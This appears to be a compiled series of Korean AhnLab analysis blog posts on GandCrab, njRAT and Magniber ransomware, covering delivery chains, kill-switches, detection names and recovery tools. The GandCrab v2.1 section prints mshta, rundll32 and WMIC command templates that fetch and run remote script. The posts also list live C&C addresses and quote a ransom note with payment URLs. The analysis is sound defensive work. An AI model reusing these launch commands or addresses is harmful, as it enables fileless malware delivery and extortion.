1. 요약

2018.05.09 오후부터 채용 정보사이트에 기재된 인사담당자를 대상으로 한 이력서 형태의 랜섬웨어가 집중 유포되고 있다. 입사지원자를 사칭한 메일로 인사담당자가 메일 본문에 포함된 링크를 클릭하면 랜섬웨어 다운로드 페이지로 연결된다. 해당 페이지에서 이력서로 위장한 압축 파일을 다운로드 받아 실행 시 GandCrab 랜섬웨어에 감염된다.

[그림1 유포_경로]

2. 유포 및 감염 방법

사회공학 기법을 이용한 스팸메일로 채용 정보사이트에 기재된 채용담당자를 공격대상으로 삼았다. 아래와 같이 이력서엔 소개 글과 함께 이력서를 첨부하였습니다라는 링크 클릭을 유도하는데 이 서버(www.d****aw/doc.php)를 접속할 시 지원자 명의 압축파일을 다운로드 한다.

[그림2 지원_메일]

이 압축 파일(min_hee_resume.zip)을 해제하면 스크립트 파일(resume.js)이 존재한다.

[그림3 압축_파일]

이 스크립트는 난독화 되어 있어 아래와 같이 알아 볼 수 없는 문자열로 보이는데 복호화를 했을 경우 아래와 같이 랜섬웨어 유포 페이지((www.yo****p.com/update.php)등을 확인할 수 있으며 기능은 이 서버에 접속해 랜섬웨어(랜덤_이름).exe를 다운로드 후 실행한다.

[그림4 난독화__스크립트]


[
그림5 복호화__URL스트링]

3. 감염 예방 방법

 의심스러운 파일은 다운로드 및 실행하는 것을 지양해야 하며 V3의 최신 버전에선 탐지가 되기 때문에 주기적인 보안 업데이트가 필요하다.

4. 진단명

1) 스크립트 파일 : JS/Obfus.S258

2) EXE 파일 : Win-Trojan/Gandcrab.Exp

3) 행위 진단 : Malware/MDP.Create.M1179
 


Posted by 분석팀

GandCrab 랜섬웨어는 최근 Magnitude 익스플로잇 킷을 통해 Fileless 형태로 유포 중임이 발견되었다. 이전 블로그에도 게시했던 것처럼 Magniber 유포지 확인 중 새로운 버전의 GandCrab v2.1이 유포 됨을 확인한바 있다이와 관련하여 자사에서는 금주부터 GandCrab v3.0이 Magnitude 익스플로잇 킷을 통해 Fileless 형태로 유포 중임을 추가 확인하였다


[그림 1] 4월 30일 유포과정 구조도

[그림 2] 5월 2일 유포과정 구조도

[그림 1]과 [그림2]는 각각 4월 30일, 5월 2일 Magnitude 익스플로잇 킷을 통해 유포되는 GandCrab v3.0의 구조도이다. 유포 스크립트로부터 GandCrab v3.0 랜섬웨어가 실행되기까지의 상세한 과정은 아래와 같다.


[그림 3] 인코딩된 유포 스크립트

[그림 3]은 Magnitude 익스플로잇 킷의 랜딩페이지로 인코딩 형태이다. [그림 4], [그림 5]은 각각 4월 30일, 5월 2일 수집된 해당 스크립트의 디코딩한 모습이다. 


[그림 4] 디코딩된 유포 스크립트 (04/30)


[그림 5] 디코딩된 유포 스크립트 (05/02)

[그림 4], [그림 5]의 디코딩된 스크립트는 빨간 박스의 변수에 담긴 문자열(Base64 인코딩된 닷넷 DLL) 을 디코딩 후 실행한다. 해당 방식은 디코딩된 닷넷 DLL을 로컬에 드랍하지 않고 실행하는 Fileless 방식이다. 따라서 닷넷 DLL은 해당 유포스크립트가 동작하던 iexplore.exe 의 메모리에서 동작하게 된다.


[그림 6] Base64 디코딩된 닷넷 PE (04/30)


[그림 7] Base64 디코딩된 닷넷 PE (05/02)

[그림 6]과 [그림 7]은 각각 4월 30일, 5월 2일 유포 스크립트 내부의 닷넷 DLL 코드이다. 유포 스크립트로 인해 해당 DLL이 실행되면 <그림 2>,<그림 3>에 보이는 array에 담긴 쉘코드를 쓰레드로 실행시킨다. 해당 쉘코드는 [그림 1],[그림 2] 의 구조도에서 보이는 패킹된 DLL을 다운로드하고 실행하는 역할을 수행한다.


[그림 8] 쉘코드로부터 다운로드되는 DLL (04/30)


[그림 9] 쉘코드로부터 다운로드되는 DLL (05/02)

[그림 8]과 [그림 9]는 각각 4월 30일, 5월 2일 쉘코드로부터 다운로드 및 실행되는 DLL이다. 날짜별 실행방식에 차이는 인젝션 대상 프로세스이다. 4월 30일 자 DLL의 경우 svchost.exe에 인젝션을 시도하며, 실패 시 현재 프로세스(iexplore.exe)에 랜섬웨어를 인젝션한다. 5월 2일 자 DLL의 경우에는 wimserv.exe 에 인젝션을 시도하며, 실패 시 현재 프로세스(iexplore.exe)에 랜섬웨어를 인젝션 하게 된다.


[그림 10] GandCrab v3.0 의 랜섬노트


[그림 11] GandCrab v3.0 감염 후 변경 된 바탕화면


인젝션되어 동작하는 GandCrab 랜섬웨어는 파일 암호화를 수행하고, 감염이 완료되면 [그림 10]과 같이 랜섬노트를 팝업시키며, 이전 버전과 달리 [그림 11] 처럼 바탕화면이 변경된다.


감염 예방방법

- 취약점 패치

결과적으로 GandCrab은 Fileless의 형태로 동작하는 것과 개인키 확인을 어렵게 하는 점으로 보아 진단 및 복구를 힘들게 한다고 할 수 있다. 따라서 확인되지 않는 페이지의 접근을 지양하고 접속 시 사용자의 각별한 주의가 필요하며 주기적인 보안 업데이트가 필요하다. (아래 참고)

스크립팅 엔진 메모리 손상 취약점 (CVE-2016-0189)

취약점 대상의 인터넷 익스플로러 버전 9, 10, 11이며 아래 경로에서 최신 버전의 인터넷 익스플로러를 다운로드 할 수 있다.

https://support.microsoft.com/en-us/help/17621/internet-explorer-downloads

또한 윈도우 보안 업데이트는 다음과 같이 진행 할 수 있다.

윈도우 시작 버튼 -> 모든 프로그램 -> Windows Update

Posted by 분석팀

현재까지 GandCrab 랜섬웨어의 유포는 익스플로잇 킷(Exploit Kit)을 통한 유포와 'OO지원서' 'OO내용증명' 등의 이메일 첨부 파일을 이용한 유포 방식이 주로 확인되었다. 이러한 유포 방식과 더불어 GandCrab 랜섬웨어 파일을 구동하는 방식 또한 다양하게 확인되고 있다. 금주 자사에서는 실질적인 랜섬웨어 기능을 하는 GandCrab DLL이 svchost.exe에 인젝션되어 동작하는 변형을 발견하였다. explorer.exe에 인젝션하여 동작하였던 기존의 방법과는 차이를 보인다. 

유포된 파일은 인코딩된 바이너리를 포함하고 있으며, 이를 언패킹 하여 최종 EXE 실행 파일을 메모리상에 생성한다. 이 실행 파일은 실질적인 랜섬웨어 기능을 하는 악성 DLL 파일을 메모리상에 만들고 이를 정상 프로세스인 svchost.exe 프로세스를 실행한 뒤 프로세스에 코드를 인젝션한다. 대상이 되는 svchost.exe 프로세스는 파일 내에 하드코딩 되어 있다. 기존의 Fileless GandCrab은 explorer.exe 프로세스에 인젝션 했던 점과 비교된다. 프로세스에 인젝션 된 DLL 파일은 기존에 파악된 DLL 파일과 코드 흐름 및 동작 방식이 유사하다. 

주목할 점은 이번 GandCrab 랜섬웨어는 파일 암호화 후 나타나는 랜섬노트에 표기된 버전과 실질적인 암호화 기능을 수행하는 DLL 파일 내에 하드코딩 된 버전이 다르다는 점이다. 랜섬노트에는 ‘GandCrab V2.1’로 나오지만, 실제로 공격자에게 전달되는 내부 버전 정보는 '3.0.0'으로 확인되었다. 비슷한 시기에 접수된 또 다른 GandCrab 역시 랜섬노트에서는 'GandCrab V2.1'이었지만 내부 버전 정보는 '2.3.2'으로 확인되었다.

해당 데이터는 암호화 PC의 고유 ID, 암호화 키 등의 값과 함께 공격자에게 HTTP 통신 파라미터로 전달된다. 내부 버전 3.0.0으으로 명시된 DLL 파일은 바이너리 빌드 날짜가 2018년 4월 23일(UTC)로, 랜섬웨어 공격자는 최근까지도 악성코드를 제작 및 유포하고 있다는 점을 알 수 있다.


GandCrab V2.1 (내부 버전 "version=3.0.0") Kill-Switch (암호화 차단 방법)

자사에서는 GandCrab V2.1 (내부 버전 "version=3.0.0")이 특정 조건에서 암호화가 중단 될 수 있는 Kill-Switch를 확인하였다. 시스템 C:\ 경로 내에 'MalwarebytesLABs' 이름을 가진 파일 또는 폴더가 있을 경우엔 다음과 같은 메시지 박스 창이 뜨면서 [확인] 버튼에 대한 사용자의 마우스 또는 클릭 동작(이벤트)을 대기한다. 이 과정에서 악성 프로세스가 사용자 동작이 있기 전까지 대기를 하기 때문에 암호화 단계로 넘어가는 것을 일시적으로 멈추게 된다. 따라서 다음과 같은 메시지박스가 떴을 경우에는 [확인] 버튼을 클릭하거나 창을 닫지 말고 즉시 시스템을 종료하면 암호화가 되는 것을 방지할 수 있다. 메시지 박스가 뜨기 위해서는 C:\MalwarebytesLABs 파일 또는 폴더가 존재해야하며 다음과 같이 두 가지 방식으로 예방법을 가이드한다. 

  • 첫 번째 방법) C:\ 경로에 'MalwarebytesLABs' 이름을 가진 폴더를 생성한다.


  • 두 번째 방법) C:\ 경로에 'MalwarebytesLABs' 이름(확장자 없음)을 가진 파일을 생성한다. 혹은 다음 첨부된 파일을 위치시킨다.
    MalwarebytesLABs
다음과 같은 메시지 박스가 떴을 때는 [확인] 버튼이나 [X] 버튼을 클릭하지 않고 그 즉시 시스템을 종료/재부팅한다. 


현재 안랩 제품에서는 GandCrab V2.1 (내부 3.0.0) 악성코드를 다음과 같이 진단하고 있다.

  • 파일 진단: Trojan/Win32.RansomCrypt (2018.04.24.02)
  • 행위 진단: Malware/MDP.Inject.M464


Posted by 분석팀

온라인상에 텍스트나 소스코드 데이터를 저장해서 공유할 수 있는 Pastebin (페이스트빈) 서비스를 이용한 악성코드가 발견되었다. Pastebin 서비스에 Raw 데이터 텍스트 스트링을 올려두면 부여되는 고유한 URL을 통해 접속할 수 있는 점을 이용하였다. 

악성코드는 성인물로 위장하여 ‘2.zip’ 압축 파일명으로 유포되었다. 실행된 악성코드는 단독으로 동작하거나 실행되지 않고 여러 개의 Visual Basic 스크립트 파일과 EXE 실행 파일을 만들거나 메모리에 로드하여 최종 파일을 생성한다. 이 과정에서 악성코드는 Pastebin 도메인의 각기 다른 4개 URL에 접속하여 해당 주소의 텍스트 데이터를 받아 악성코드를 로딩하는 데 이용한다. 최종 실행되는 파일은 ‘njRAT’ 이름을 가진 원격 제어 (Remote Access) 기능의 백도어이다. 다음은 최초 유포 파일로부터 최종 원격 제어 악성코드가 실행되기까지의 과정을 도식화한 것이다.

Pastebin을 통해 받아오는 Raw 데이터 텍스트 스트링은 다양한 목적과 형태로 되어있다. 인코딩된 또 다른 스크립트를 포함한 Visual Basic 스크립트 파일, 다른 Pastebin 주소로 연결하여 텍스트 스트링을 받아오는 Visual Basic 스크립트 파일, 그리고 인코딩된 PE 파일 바이너리가 확인되었다. 이렇게 외부 리소스를 이용해 악성코드 데이터를 받아오는 것은 최초 유포 파일의 용량을 크게 줄임과 동시에 백신의 개별 파일 시그니처 탐지 또는 이상 행위 탐지를 우회하기 위한 것으로 보인다. 또한 중간에 리소스 파일이 문제가 있을 때 이를 교체하기도 쉽다.

여기서 가장 마지막으로 Pastebin에 접속해 받아오는 스트링은 인코딩된 Base64 데이터로, 위 그림에서 (10) 파일에 해당한다. 이를 호출한 (9) 파일은 다음과 같이 텍스트 스트링을 디코딩한 후 바이트 배열로 변환하고 Invoke 메소드를 통해 .NET PE 파일의 EntryPoint를 호출한다. 그리고 이 모든 과정은 로컬에 생성된 (8) 파일의 프로세스 메모리 내에서 동작한다.

실행된 PE 파일은 파일 내 난독화된 스트링 오브젝트를 이용해 악성 기능을 수행하는 핵심적인 실행 파일을 또다시 메모리상에 로드한다. 이 파일은 원격 제어 기능을 수행하는 파일이며 다음과 같은 기능을 포함하고 있다. 또한, 아래 기능은 njRAT 원격 제어 백도어 악성코드와 그 기능이 같다. 공격자는 악성코드 제작 프로그램을 이용하여 다수의 사용자를 원격 제어할 목적으로 악성코드를 유포한 것으로 보인다.
  • 일정 간격을 두고 공격자 C&C 서버(regeditcrypter.myq-see.com:4969)와 지속된 메시지 통신 
  • DDoS 공격 - ARME Attack, Slowloris Attack
  • 비트코인과 관련한 현재 동작중인 프로세스를 찾고 있으면 코인 탈취, 지갑 주소를 포함하고 있음
  • Lime 랜섬웨어, 랜섬웨어 지갑 주소는 위 지갑 주소와 동일
  • USB 자체 전파
  • 각종 안티 분석
  • 토렌트 프로그램의 시드 - uTorrent.exe, BitTorrent.exe
  • 시스템 제어 – 전원, 작업관리자, 장치 제어
  • 시스템 정보 탈취

현재 안랩 제품에서는 Pastebin을 이용한 원격제어 유형의 악성코드를 다음 이름으로 진단하고 있다.
  • 파일 진단: Trojan/Win32.Executor (2018.03.24.08)
  • 행위 진단: Malware/MDP.Create


Posted by 분석팀

이전 블로그에도 게시했던 것처럼 Magniber 유포지 확인 중 새로운 버전의 GandCrab v2.1이 유포 됨을 확인 한바 있다이와 관련하여 자사에서는 금주부터 GandCrab v2.1이 Magnitude 익스플로잇 킷을 통해 Fileless 형태로 유포 중임을 추가 확인하였다동작 구동방식은 아래와 같다.

[그림 1] GandCrab v2.1 유포 및 동작 방식

유포 사이트 접근 시 공격자가 의도한 윈도우 정상 프로세스(‘mshta.exe’, ‘rundll32.exe’, 'WMIC.exe')를 통해 특정 URL로 접속한다. 해당 정상 프로세스를 통해 접속하는 페이지에는 악성 자바스크립트가 작성 되어있다. 각 프로세스 별 스크립트 실행방식은 아래의 [표3]의 명령을 보면 이해가 쉽다.

mshta.exe 로 구동되는 커맨드 명령

GetObject("new:13709620-C279-11CE-A49E-444553540000").ShellExecute "mshta","vbscript:Close(Execute("GetObject("script:"URL")))"

[표 1] mshta.exe로 구동되는 커맨드 명령

rundll32.exe 로 구동되는 커맨드 명령

GetObject("new:13709620-C279-11CE-A49E-444553540000").ShellExecute "Rundll32.exe",\"javascript:"\\..\\mshtml,RunHTMLApplication \"&\"&\";document.write();GetObject('script:URL')\"

[표 2] rundll32.exe로 구동되는 커맨드 명령

WMI 로 구동되는 커맨드 명령

GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8").Run "wmic process call create "'"mshta vbscript:Close(Execute("""GetObject(""""script:"URL""")"""))"'

[표 3] WMI 로 구동되는 커맨드 명령

[그림 2] 악성 페이지에 작성되어 있는 Jscript 일부 (PE base64 인코딩 된 형태 포함)

해당 스크립트는 코드 내부에 Base64로 인코딩 된 DLL 이미지를 디코딩하여 메모리 상에서 동작하도록 한다. 이 디코딩 된 DLL 이미지는 내부에 또 다른 DLL 이미지(핵심 GandCrab v2.1)를 explorer.exe에 인젝션하여 동작하도록 한다. 이 모든 과정에서 Jscript PE 이미지는 파일로 드롭 혹은 다운로드되지 않은 채 메모리 상에서만, Fileless 형태로 동작한다.


GandCrab Kill-Switch (암호화 차단 방법)

자사에서는 GandCrab이 특정 조건에서 암호화가 중단 될 수 있는 Kill-Switch를 확인하였다

"Text.txt" 파일 내부에 10바이트의 특정 데이터가 존재할 경우 해당 파일이하 경로는 암호화하지 않는다. 특정 데이터를 포함한 "Text.txt" 각 드라이브 루트경로에 위치 시킬 경우, 해당 드라이브 하위의 파일들에 대한 암호화를 막을 수 있게된다.

(예시)

- C:\Text.txt (C드라이브 하위 암호화 차단)

- D:\Text.txt (D드라이브 하위 암호화 차단)

[그림3] 암호화 차단 할 수 있는 "Text.txt" 내부 데이터 값

아래에 첨부 된 "Text.txt"를 다운로드하여 각 드라이브의 루트 경로에 복사해 놓을 경우, GandCrab에 감염되어도 파일 암호화를 막을 수 있다.


동작방식 외 변경사항

GandCrab v2.1은 v2.0과 비교하였을 때, 유포 방식 및 DLL을 통한 동작 방식으로 변형 된 점이 가장 눈에 띠며, 추가적으로 아래와 같은 사항들이 조금씩 변화하였다.


[변화1] - 네트워크 관련

기존의 GandCrab에서는 C&C주소를 도메인으로 가지고 있던 반면 v2.1에서는 IP 주소로 된 C&C에 접근한다. C&C확인에 혼란을 주기 위해 코드 내부에 다른 도메인을 함께 가지고 있으나 핵심적으로 접근하는 C&C는 한개이다현재까지 확인 된 DLL 파일 별 C&C 주소는 아래와 같다.

- 217.182.21.114

- 217.182.21.115

- 167.114.214.56

- 193.70.60.127

- 185.82.202.202

또한 GandCrab 초창기 버전의 기능과 마찬가지로 사용자 정보 및 공개키 쌍을 암호화하여 C&C에 전송되는데, 이때 최근 버전에서는 전송 시 패킷 덤프 상 정상의 접속인 것처럼 보이게 하기 위하여 구글 도메인 주소를 아래와 같이 패킷 헤더에 ‘HOST: google.com’ 문자열로 추가한다.

[그림 4] GandCrab v2.1C&C와 통신 시 정상 패킷 위장을 위해 사용하는 헤더 문자열

 

[변화2] - 암호화 제외 확장자

v1 대의 초창기 GandCrab에서는 암호화 대상 확장자 리스트를 가지고 있었으나, v2.0부터는 암호회 제외 확장자 리스트를 가진다. 이 리스트는 XOR로 암호화되어 가지고 있으며 v2.1에서는 v2.0과 비교하여 1개의 확장자 리스트가 추가되었다.


.ldf가 추가 된 암호화 제외 확장자 리스트(43)

.ani, .cab, .cpl, .cur, .diagcab, .diagpkg, .dll, .drv, .hlp, .ldf, .icl, .icns, .ico, .ics, .lnk, .key, .idx, .mod, .mpa, .msc, .msp, .msstyles, .msu, .nomedia, .ocx, .prf, .rom, .rtp, .scr, .shs, .spl, .sys, .theme, .themepack, .exe, .bat, .cmd, .CRAB, .crab, .GDCB, .gdcb, .gandcrab, .yassine_lemmou

[표 4] GandCrab v2.1에 추가 된 암호화 제외 확장자

이 외의 아래에 명시 된 기능은 v2.0버전과 동일하다.

(상세 목록은 http://asec.ahnlab.com/1101, http://asec.ahnlab.com/1091 참고)


- 현재 동작 중인 특정 프로세스 종료

- AntiVirus 관련 프로세스 확인 목록

- 암호화 제외 경로 및 파일명 리스트


암호화 방식 또한 v2.0과 동일하나해당 내용은 이전 글에서 언급하지 않아 아래에 설명하고자 한다.


파일 암호화 방식 (v2.0 & v2.1)

GandCrab v2.1은 공개키 기반의 암호화 방식을 사용한다암호화 대상이 되는 파일마다 랜덤한 키 바이트를 생성하여 AES-256 방식으로 암호화한 뒤 랜덤 키 바이트를 다시 공격자의 공개키로 암호화 한다따라서 암호화된 파일을 복호화를 하기 위해서는 공격자의 개인키가 필요하다아래 [그림 5] GandCrab v2.1의 암호화 방식을 요약한 그림이다먼저 로컬에서 공개키/개인키 쌍을 생성한 뒤 공격자의 C&C 서버에 생성한 키 값을 전송한다이후 공격자는 자신의 공개키를 감염 PC에 전송하여 사용자 로컬 PC에서 생성한 랜덤한 키 값을 암호화 하는데 활용한다따라서 공격자의 C&C 서버에서 전달받은 공개키에 대한 개인키를 알지 못하면 파일의 복구는 불가능하다.

[그림 5] GandCrab v2.1의 암호화 방식


GandCrab v2.1에 의해 파일 암호화가 완료된 파일의 구조는 [그림 6]과 같다.


[그림 6] 암호화된 파일의 구조

[그림 6]은 원본의 파일 크기가 0x220인 파일을 암호화한 결과이다. 파일 끝 0x208 크기의 값은 복호화에 필요한 값들을 저장하고 있다. 공격자의 공개키로 키 값과 벡터 값을 암호화 하기 때문에 복호화를 위해서는 공격자의 개인키가 필요하다.


[4월 20일자] - Update!!

20일자 GandCrab v2.1 이미지에서 기존에 없던 아래와 같은 뮤텍스를 생성하며, C&C와 통신 할 시 보내는 HTTP 헤더 문자열을 "HOST: google.com"에서 "HOST: ahnlab.com"으로 변경하였음을 확인하였다.

[그림 7] Mutex 추가 생성 코드

[그림 8] HOST 문자열 변경


감염 예방방법

1. 취약점 패치

결과적으로 GandCrab Fileless의 형태로 동작하는 것과 개인키 확인을 어렵게 하는 점으로 보아 진단 및 복구를 힘들게 한다고 할 수 있다따라서 확인되지 않는 페이지의 접근을 지양하고 접속 시 사용자의 각별한 주의가 필요하며 주기적인 보안 업데이트가 필요하다. (아래 참고)

스크립팅 엔진 메모리 손상 취약점 (CVE-2016-0189)

취약점 대상의 인터넷 익스플로러 버전 9, 10, 11이며 아래 경로에서 최신 버전의 인터넷 익스플로러를 다운로드 할 수 있다.

https://support.microsoft.com/en-us/help/17621/internet-explorer-downloads

또한 윈도우 보안 업데이트는 다음과 같이 진행 할 수 있다.

- 윈도우 시작 버튼 -> 모든 프로그램 -> Windows Update


2. DEP (Data Execution Prevention) Enable

Fileless 형태로 유포되는 GandCrab v2.1은 윈도우 정상 프로세스인 explorer.exe DLL 인젝션을 통해 감염이 수행된다이때 DEP가 모든파일로 설정된 경우사전에 차단되어 동작하지 않는 것을 확인하였다. WinXP, Win7, Win10 에서 DEP를 설정하는 방식 첨부한 워드 문서를 참고.

DEP 설정방법.docx


V3 대응

GandCrab 랜섬웨어가 암호화 행위를 수행하기 위해 C&C에 접속하는 패킷을 차단하며아래와 같은 화면으로 차단됨을 알 수 있다. (IS9.0 제품) 차단된 프로세스 explorer.exe는 악성코드에 의해 새롭게 생성된 프로세스 임.

V3 Lite 제품에서는 Magnitude 익스플로잇 킷관련 웹 사이트에 방문 시,  아래와 같이 사전차단이 이루어지는 것을 알 수 있다.


Posted by 분석팀

기존의 메그니베르(Magniber) 랜섬웨어 복구툴을 GUI형태로 개선하였으며, 4 8일부터 확인된 가변적 벡터로 인해 복구가 불가능한 부분을 지원한다. (, 확장자, 키 정보와 함께 암호화/복호화 파일 쌍이 존재하는 경우로 제한)


새로운 복구툴은 아래와 같은 화면이며, 암호화 확장자 정보만 입력하면 해당하는 키(Key), 벡터(IV)정보가 보여지는 구조를 갖는다. 확장자에 대한 키, 벡터정보는 복구툴 내부에 "magniber.db" 이름의 데이터베이스 파일로 관리되며 지속적으로 업데이트하여 제공할 예정이다. 만약, 확장자 입력 후 키, 벡터정보가 보여지지 않으면 복구가 불가능한 것으로 "magniber.db" 파일이 업데이트가 되어야 한다.



[복구툴 사용방법]


1) 감염된 PC“MagniberDecrypt.exe” 파일을 다운로드 및 실행합니다.

- 복구 시 드라이브를 자동으로 탐색하기 때문에 설치 경로는 중요하지 않습니다.



2) 복구툴 실행 시, 같은 경로에 설치파일이 포함된 폴더가 생성되고, 자동으로 프로그램이 실행됩니다. 프로그램 창이 뜨면 암호화 확장자를 입력하는 부분에 암호화된 파일의 확장자를 입력하고 확인버튼을 누릅니다.



사례(1) : 확장자 입력 시 KeyIV 값 모두 표시


확장자를 입력하고 확인버튼을 눌렀을 때 KeyIV 값이 존재하는 경우, “Start” 버튼을 누르면 자동으로 파일을 복구합니다. 암호화된 파일은 삭제되지 않습니다. 이에 복호화를 위한 별도의 용량을 확보해 두어야 합니다.




사례(2) : 확장자 입력 시 Key 값만 존재 (IV 값 없음)


아래의 그림에서 처럼 확장자를 입력했을 때 Key 값만 존재하는 경우, 원본 파일과 암호화된 파일이 필요합니다. 원본 파일은 랜섬웨어 감염 시 접속되는 페이지에서 제공하는 복구 작업을 통해 얻어야 합니다 일정시간이 지나면 해당 서비스 페이지에 접속이 불가능하니 감염 시점에 복구 파일을 백업해 둘 필요가 있습니다.


ASEC블로그: http://asec.ahnlab.com/1127 (참고)



원본 파일과 감염된 파일 한 쌍이 확보된 경우, 복구툴 원본 파일”, “암호화 파일에 각각의 파일 경로를 입력합니다. “…” 버튼 클릭 시 파일을 선택할 수 있습니다. 입력 후 “Start” 버튼을 누르면 자동으로 파일을 복구합니다. 감염 파일은 삭제되지 않습니다.




사례(3) : 확장자 입력 시 지원하지 않는다는 경고 창 생성 (magniber.db 파일 업데이트 필요)

 

1) 확장자 입력 시 아래 그림과 같은 경고창이 발생하는 경우게시글에 첨부된 "magniber.db" 파일 업데이트가 필요합니다. "magniber.db" 파일은 확장자, Key, IV 값이 저장되어 있으며 지속적으로 업데이트 될 예정입니다.




2) ASEC블로그를 통해 데이터베이스 파일이 업데이트된 경우MagniberDecrypt.exe 파일을 실행한 경로와 같은 경로에 생성된 폴더("AhnlabMagniberDecrypt") 들어가서 magniber.db 파일을 덮어씁니다.

 

[주의] 

magniber.db 파일을 업데이트 한 경우원본 MagniberDecrypt.exe”를 재 실행시키면 magniber.db 파일이 초기화됩니다따라서 복구툴을 종료하고 다시 실행시킬 경우에는 AhnlabMagniberDecrypt 폴더에 존재하는 MagniberDecrypt.exe”를 사용하세요.



사례(4) : magniber.db 가 아닌 수동으로 값을 입력해야 하는 경우

 

복구툴 우측 상단에 존재하는 “전문가용”을 체크하고 키와 벡터 정보를 직접 복구툴에 입력해줍니다입력 후 Start 버튼을 누르면 자동으로 파일을 복구합니다암호화된 파일은 삭제되지 않습니다이에 복호화를 위한 별도의 용량을 확보해 두어야 합니다.

 

*복구툴 다운로드: https://www.ahnlab.com/kr/site/download/product/productVaccineList.do

(위 페이지 접속하여 "MagniberDecrypt.exe" 파일 다운로드)


[4월 19일자] - Update!!


[4월 12일자]

복구가능목록.xlsx

magniber.db



* 기존에 아래의 페이지에 [] 형태로 제공한 확장자//벡터 정보는 수량이 많아, 앞으로는 DB파일과 엑셀파일 형태로 첨부하여 제공합니다.

- http://asec.ahnlab.com/1125


* 기존 Github에 공개된 Magniber 랜섬웨어 복구관련 소스코드에서는 CHUNK_SIZE 128 바이트로 되어있으나, 현재 국내 유포되는 형태는 0x100000 바이트이다. 해당 값이 수정되지 않으면, 일부 복구된 파일 끝에 패딩 데이터가 존재하여 실행 시, 손상파일로 인식될 수 있다.

https://gist.github.com/evilsocket/b89df665e6d52446e3e353fc1cc44711


Posted by 분석팀

메그니베르(Magniber) 랜섬웨어 유포지 모니터링 작업 중, 4 11()부터 기존의 메그니베르가 아닌 GandCrab 랜섬웨어가 유포되는 것이 확인되었다. GandCrab 랜섬웨어는 공개키 방식으로 암호화하는 것으로 알려져 있어 복구가 불가능 함으로 사용자 주의가 요구된다유포에 사용되는 취약점 및 생성경로파일의 외형은 모두 메그니베르와 동일한 것을 볼 때제작자가 복구툴 배포작업으로 인해 랜섬웨어를 교체한 것으로 추정된다.

 

유포에 사용되는 취약점은 동일함으로 취약점 패치를 통해 감염을 차단하는 것이 필요하다.


아래의 그림은 4 11일 수집된 GandCrab 랜섬웨어에 의해 보여지는 랜섬노트와 감염 후 확장자를 나타낸다. 기존 3 19일자 ASEC블로그에 언급된 샘플에서는 버전이 2.0에서 현재는 2.1로 유포되는 것을 확인할 수 있다


http://asec.ahnlab.com/1101 (3월 19일자 GandCrab 관련 글)





  • 파일명: uD4ia0J3.exe (V3: Win-Trojan/RansomCrypt.Exp / 2018.04.11.06 엔진버전)
  • md5: 99bd57898469f06450000411790a505b


[취약점 패치]


스크립팅 엔진 메모리 손상 취약점 (CVE-2016-0189)


취약점 대상의 인터넷 익스플로러 버전은 다음과 같습니다.

인터넷 익스플로러 9, 10, 11


최신 버전의 인터넷 익스플로러는 다음 경로에서 자신의 OS 환경에 맞는 것으로 다운로드 할 수 있습니다.

https://support.microsoft.com/en-us/help/17621/internet-explorer-downloads


또한 윈도우 보안 업데이트는 다음과 같이 진행 할 수 있습니다.

윈도우 시작 버튼 -> 모든 프로그램 -> Windows Update


[참고]


기존 메그니베르 랜섬웨어 복구에 필요한 확장자//벡터 정보는 지속적으로 업데이트하여 제공할 예정입니다. http://asec.ahnlab.com/1125


Posted by 분석팀

4 8일 이후 확인된 메그니베르(Magniber) 랜섬웨어는 기존의 복구툴로 복구가 불가능하다. 이유는 복구를 위해 필요한 벡터정보를 고정값이 아닌 랜덤하게 생성하여 발생한 것으로 동일한 확장자로 암호화된 파일이라도 사용자마다 사용된 벡터정보가 다를 수 있다. (하나의 시스템에서 암호화된 파일은 동일 벡터가 사용)

 

이러한 문제로 인해 테스트로 복구 서비스를 제공하는 웹 페이지에서도 일부 알려진 포멧(JPG, PNG, BMP, DOCX, PPTX, HWP, XLSX 등)의 파일들을 제외하고 복구가 실패하는 것을 알 수 있다. 또한, 하나의 파일 복구에 8시간 정도 소요될 수 있다는 문구가 추가되었다.

 

4 8일 이후에 암호화된 파일을 복구하기 위해서는 감염시점에 무료로 복구 테스트를 제공하는 페이지를 통해 암호화 파일복호화 파일 한 쌍을 백업해 둘 필요가 있다. (일정시간이 지나면 해당 서비스 페이지 접속불가) 실패없이 복구에 성공하기 위해서 테스트 복구대상으로는 그림파일, 문서파일 등이 사용되는 것이 좋다. (*.doc, *.pdf, *.xls, *.ppt, *.hwp, *.docx, *.xlsx, *.pptx, *.jpg, *.bmp, *.png 등)

 

[그림-1] README.txt 파일에 표시된 URL 주소로 접속 시, 사용자에게 보여지는 웹 페이지


[그림-2] 1개의 파일을 무료로 복구 서비스 제공하는 페이지


이러한 작업을 통해 암호화 파일과 해당 파일에 대한 복호화 파일 한 쌍을 백업한 후, 추후 ASEC블로그를 통해 제공 예정인 확장자, 키 정보를 통해 아래와 같이 입력하면 암호화에 사용된 벡터정보를 추출할 수 있다. 이 벡터 정보를 통해 기존의 툴에서 확장자, , 벡터정보를 입력하면 암호화된 파일 전체를 복구할 수 있다.



현재 안랩에서 확보한 메그니베르 랜섬웨어에 대한 확장자, 키 정보는 지속적으로 업데이트할 예정이다


Posted by 분석팀

작년 10월부터 국내 사용자만을 대상으로 유포되는 메그니베르(Magniber) 랜섬웨어에 대한 복구툴을 ASEC 블로그를 통해 4 2일에 공개했다확장자 별 복구에 필요한 키벡터정보 제공을 통해 해당 확장자로 암호화된 사용자에게 복구할 수 있는 기능을 제공하였다하지만지난 주말(4 8)에 확인된 메그니베르에서는 복구에 필요한 벡터정보를 랜덤하게 생성하는 구조로 암호화 방식이 변경되었다동일한 암호화 확장자에 서로 다른 벡터 값이 생성되는 구조를 갖는다

(GetTickCount 함수를 통한 랜덤생성)


[기존] README.txt

: URL 주소에서 붉은색 표시부분이 벡터정보에 해당한다.


ALL YOUR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!

=========================================================================================

 Your files are NOT damaged! Your files are modified only. This modification is reversible.


 The only 1 way to decrypt your files is to receive the private key and decryption program.


 Any attempts to restore your files with the third party software will be fatal for your files!

 ========================================================================================

 To receive the private key and decryption program follow the instructions below:


 1. Download "Tor Browser" from https://www.torproject.org/ and install it.


 2. In the "Tor Browser" open your personal page here:


 http://0290t5v57ebu3f22r41.7pvbou2ievub53gq.onion/WB7Nd859MS90Q017


 Note! This page is available via "Tor Browser" only.

 ========================================================================================

 Also you can use temporary addresses on your personal page without using "Tor Browser":


 http://0290t5v57ebu3f22r41.pistay.pw/WB7Nd859MS90Q017


